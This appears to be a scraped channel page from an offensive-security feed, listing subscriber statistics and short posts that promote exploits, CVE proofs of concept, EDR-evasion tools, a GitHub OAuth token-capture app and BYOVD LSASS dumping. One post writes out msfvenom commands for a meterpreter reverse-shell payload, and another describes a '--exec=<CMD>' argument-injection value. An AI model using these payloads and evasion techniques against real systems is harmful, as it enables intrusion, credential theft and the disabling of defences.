reconcore

#vulnerability #research #cve #rce #lpe #poc #tools #pentest #redteam #blueteam #offensivesecurity #technique #methods Educational use only. Content from public sources. Admin holds no liability for misuse. Users are solely responsible for their actions.

2,158 subscribers
+3 in 24 hours, +13 in 7 days, +60 in 30 days


Subscriber growth by month (growth / mentioned in N channels):
June '26: +25 (in 0 channels)
May '26: +92 (in 1 channel)
April '26: +89 (in 2 channels)
March '26: +116 (in 1 channel)
February '26: +145 (in 1 channel)
January '26: +157 (in 2 channels)
December '25: +317 (in 3 channels)
November '25: +170 (in 0 channels)
October '25: +216 (in 1 channel)
September '25: +125 (in 2 channels)
August '25: +118 (in 5 channels)
July '25: +96 (in 2 channels)
June '25: +51 (in 1 channel)
May '25: +68 (in 3 channels)
April '25: +117 (in 2 channels)
March '25: +84 (in 1 channel)
February '25: +108 (in 1 channel)
January '25: +73 (in 2 channels)
December '24: +4 (in 0 channels)
November '24: +127 (in 0 channels)
October '24: +38 (in 0 channels)
September '24: +37 (in 0 channels)
August '24: +328 (in 0 channels)
July '24: 0 (in 0 channels)
June '24: +15 (in 1 channel)
Daily subscriber growth (date / growth):
10 June: +3
09 June: +3
08 June: +1
07 June: +4
06 June: +1
05 June: +1
04 June: +4
03 June: 0
02 June: +6
01 June: +2
Channel posts
RoguePlanet
Windows Defender LPE. The exploit is a race condition, so it's hit or miss. I have managed to get a 100% success rate on some machines while it struggled to work on others. The exploit has been tested on Windows 11 (Official channel + Canary) and Windows 10 with the June 2026 patch installed. The PoC, however, does not work on Windows Server since standard users cannot mount an ISO image. I'm confident that all Windows Server versions are vulnerable as well; you just need to redesign the exploit.
#vulnerability #race_condition #lpe #poc @reconcore

2
BOF Cocktails in Cobalt Strike: Instrumenting BOFs with BEACON_INLINE_EXECUTE and Crystal Palace Original text: “BOF Cocktails in Cobalt Strike” — Rasta Mouse, rastamouse.me (05 Jun 2026). Code blocks and the screenshot below are reproduced verbatim from the source with attribution. Post-exploitation Beacon Object Files (BOFs) historically inherited their evasion posture from whatever agent or loader executed them. If the loader took care of unhooking, masking,… #redteam #bof @reconcore
229
3
QuadRF lets you directly explore the RF environment around you. See where signals are, the way they propagate, and how antennas and the surrounding environment interact. At 30 fps, you can map WiFi devices in a room, quadcopters in the sky, or other wireless transmitters. Expanding beyond vision and LiDAR, your robots can use QuadRF to gain real-time spatial awareness of surrounding radio beacons and access points. #rf #sdr @reconcore
223
4
DLL Hijacking Vulnerability Scanner SearchAvailableExe is a comprehensive security research tool designed to identify and analyze DLL hijacking vulnerabilities in Windows executable files. This tool systematically scans signed executables to find potential DLL hijacking opportunities, making it valuable for security researchers, penetration testers, and system administrators. #pe #re #dll #injection #analysis #binary #vulnerability #scanner #hijacking #security #research @reconcore
216
5
FirewallXPL-Forge Perimeter security exploitation framework — 164 modules covering FW, NGFW, UTM, WAF, VPN, NAC, LB, and OT/ICS firewalls (Fortinet, Cisco, Palo Alto, F5, Citrix, Check Point, SonicWall, Ivanti, Siemens, Moxa, +13 vendors). GPU-accelerated, ML-driven, async concurrency, Rich TUI. #python #firewall #penetration_testing #pentest #ngfw #exploitation #framework #redteam #ics #security #vulnerability #scanner #waf #bypass #vpn #exploit #ot @reconcore
238
6
Shellcode-EDR-Evasion-Loader: shellcode loader with XOR encryption and EDR evasion techniques. For security research and authorized testing only. Payload: msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o payload.bin. Reverse shell: msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=_ LPORT=_ -f raw -o payload.bin #shellcode #loader #windows #security #edr #evasion @reconcore
271
7
c2detect C2 server fingerprinter — Cobalt Strike, Sliver, Mythic, Havoc, Brute Ratel cognis.digital #python #cli #automation #infosec #pentest #offensivesecurity #redteam @reconcore
327
8
EDRChoker Client–server EDRs have an inherent weakness: they must maintain server connectivity to be effective. When isolated from their server they lose much of their capability, and administrators can no longer collect or monitor logs from those agents. EDRChoker uses policy-based Quality of Service (QoS) to throttle EDR agents to the lowest bandwidth; when agents attempt to connect they will consistently time out due to the extremely low bandwidth. Blog: https://www.zerosalarium.com/2026/06/edrchoker-choking-telemetry-stream-block-edr.html In this article I present a technique for interfering with the client–server connection of an EDR. It’s different from EDR connection-blocking methods that use the Windows Firewall or the Windows Filtering Platform (WFP).
365
9
CVE-2026-0826: Unauthenticated stack buffer overflow in HP Poly VVX and Trio VoIP Phones (RCE as root). Vulnerable: VVX 150, VVX 250, VVX 350, and VVX 450, as well as the Trio IP Conference series (Trio 8800, Trio 8500, and Trio 8300). Blog: https://www.rapid7.com/blog/post/ve-cve-2026-0826-critical-unauthenticated-stack-buffer-overflow-hp-poly-vvx-trio-voip-phones-fixed/
367
10
Hidden HTTP/2 Bomb * FOR nginx, Apache httpd, Microsoft IIS, Envoy, Cloudflare Pingora * WriteUP + LABs + PoCs
516
11
DarkReplica (CVE-2026-23631) Redis Post-Auth RCE Exploit The full technical writeup can be found here: https://www.zeroday.cloud/blog/redis-cve-2026-23631-dark-replica #cve #redis #technique #rce @reconcore
505
12
One Click, One Hash: Unpatched NTLM Coercion in Windows Search URI Handler. Original text by Andrew Schwartz. Key takeaways: Same bug class. No CVE. No fix. The NTLM coercion primitive in the Windows search: URI handler is technically identical to CVE-2026-33829 in the Snipping Tool. Same severity rating, same mechanism, same potential impact. Microsoft closed it without a CVE or a patch, describing its triage process as… https://core-jmp.org/2026/06/one-click-one-hash-unpatched-ntlm-coercion-in-windows-search-uri-handler/
488
13
ssh-keysign-pwn — CVE-2026-46333 A critical race condition flaw in pre-31e62c2ebbfd Linux kernels. Due to a window during process exit where the memory management structure is cleared before file descriptors are closed, an unprivileged user can use pidfd_getfd(2) to steal open file descriptors of privileged processes, enabling unauthorized reading of root-owned files. 🔗 Exploit: https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn 🔗 Source: https://blog.qualys.com/vulnerabilities-threat-research/2026/05/20/cve-2026-46333-local-root-privilege-escalation-and-credential-disclosure-in-the-linux-kernel-ptrace-path #linux #kernel #privesc #racecondition #pidfd
524
14
CVE-2026-41089 Windows Netlogon Remote Code Execution via CLDAP Stack Buffer Overflow CVSS 9.8 CRITICAL #vulnerability #rce #cldap #poc @reconcore
526
15
MalGitApp: A simple OAuth App designed to capture OAuth tokens when users authenticate through the GitHub OAuth flow. The Phishy GitHub Issue Case. Developers have become a primary target for threat actors. The reason is simple and can be easily understood: they are the backbone of the software you are using. They are the ones publishing code that will execute on your machine when developing, in your CI/CD pipelines and on the servers in production. This type of attack is called a “Supply Chain Attack”, where the attackers target the suppliers in order to compromise organizations or individuals. Basically, they compromise the third parties to reach their main target (or hit at scale). Some of the recent examples of such attacks involve Axios and LiteLLM, with their 100M downloads per week each. #phishing #oauth @reconcore
601
16
BYOVD and Looting LSASS in the Modern EDR Era In today’s post, we will be uncovering the internals of kernel driver vulnerabilities and how to leverage them via the BYOVD (Bring Your Own Vulnerable Driver) method of attack. We will use kernel access to disable PPL for the LSASS process and then proceed to dump the process to disk, XOR’ing it beforehand so it avoids detection by popular EDR solutions. https://github.com/g3tsyst3m/CodefromBlog/tree/main/2026-5-29-BYOVD%20and%20Looting%20LSASS%20in%20the%20Modern%20EDR%20Era
523
17
EDR Tradecraft: Internals, Detection, Evasion & Advanced Research Technical reference on modern EDR architecture, detection mechanisms, evasion techniques, and reverse-engineering methodology. Covers kernel callback APIs, file-system mini-filters, ETW providers, the four detection-engine model, syscall gates (FreshyCalls, RecycledGate, SysWhispers4, Acheron, Sysplant), sleep obfuscation (Ekko, FOLIAGE, DreamWalkers), call-stack spoofing (SilentMoonwalk, VulcanRaven), ETW-TI hardware-breakpoint bypass, patchless AMSI bypass via VEH, BYOVD against the vulnerable-driver blocklist, and the eight-phase EDR research methodology. #research #technique #methods #re #evasion #edr @reconcore
571
18
metasploit-framework Add Gogs rebase RCE exploit module Adds an exploit module for an argument injection vulnerability in the pull request merge flow of Gogs (<= 0.14.2 and 0.15.0+dev). The Merge() function in internal/database/pull.go passes the PR base branch name to git rebase without a -- separator. A branch named --exec=<CMD> is parsed by Git as the --exec flag rather than a positional argument, causing sh -c <CMD> to run after each replayed commit during the rebase. Authenticated RCE via Argument Injection in Gogs Rapid7 Labs discovered a critical argument injection (CWE-88) vulnerability in Gogs, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSSv4 9.4 (Critical). #vulnerability #rce #metasploit #exploit @reconcore
533
19
metasploit-framework Add Gogs rebase RCE exploit module Adds an exploit module for an argument injection vulnerability in the pull request merge flow of Gogs (<= 0.14.2 and 0.15.0+dev). The Merge() function in internal/database/pull.go passes the PR base branch name to git rebase without a -- separator. A branch named --exec=<CMD> is parsed by Git as the --exec flag rather than a positional argument, causing sh -c <CMD> to run after each replayed commit during the rebase. Authenticated RCE via Argument Injection in Gogs Rapid7 Labs discovered a critical argument injection (CWE-88) vulnerability in Gogs, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSSv4 9.4 (Critical). #vulnerabilities #rce #metasploit #exploit @reconcore
6
20
Echolalia is a Windows transport layer for Sliver. It profiles outbound traffic from a legitimate process and shapes C2 beacons to follow the same packet-size and timing profile.
474